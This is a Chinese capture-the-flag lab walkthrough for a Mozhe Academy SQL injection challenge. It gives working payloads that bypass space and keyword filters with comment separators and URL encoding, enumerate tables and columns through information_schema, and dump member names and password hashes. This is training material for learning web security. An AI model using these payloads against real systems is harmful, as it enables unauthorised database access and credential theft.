墨者学院-SQL过滤字符后手工注入漏洞测试(第2题)

靶场地址:
https://www.mozhe.cn/bug/detail/RkxnbzB6WWpWWjBuTDEyamZXNmJiQT09bW96aGUmozhe

注入点在http://219.153.49.228:46268/new_list.php?id=1

首先确认是数字型注入还是字符型注入,
id=1' 页面返回500错误
id=1# 页面回显正常,可以确定是数字型注入

接着确认题目过滤了什么
id=1 and 1=2,被拦截
id=1/**/and/**/1=2,回显正常,证明过滤了空格

测试union,select是否被过滤
id=1/**/and/**/1=2/**/union,被拦截,union被过滤
使用BurpSuite将上面注入代码进行url编码,页面回显500,成功绕过
select也被拦截,绕过方法和上述相同

现在将所有注入代码都进行url编码

id= 1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,根据回显结果,查询列有4列,2,3列回显在页面

暴数据库名和表名
id=1/**/and/**/1=2/**/union/**/select/**/1,database(),group_concat(table_name),4/**/from/**/information_schema.tables/**/where/**/table_schema=database()

暴stormgroup_member的字段名
id=1/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name='stormgroup_member'

暴status=1的账号密码,分别显示在2,3列
id=1/**/and/**/1=2/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/where/**/status=1

将密码进行md5解密,登录即可获得key

你可能感兴趣的:(墨者学院-SQL过滤字符后手工注入漏洞测试(第2题))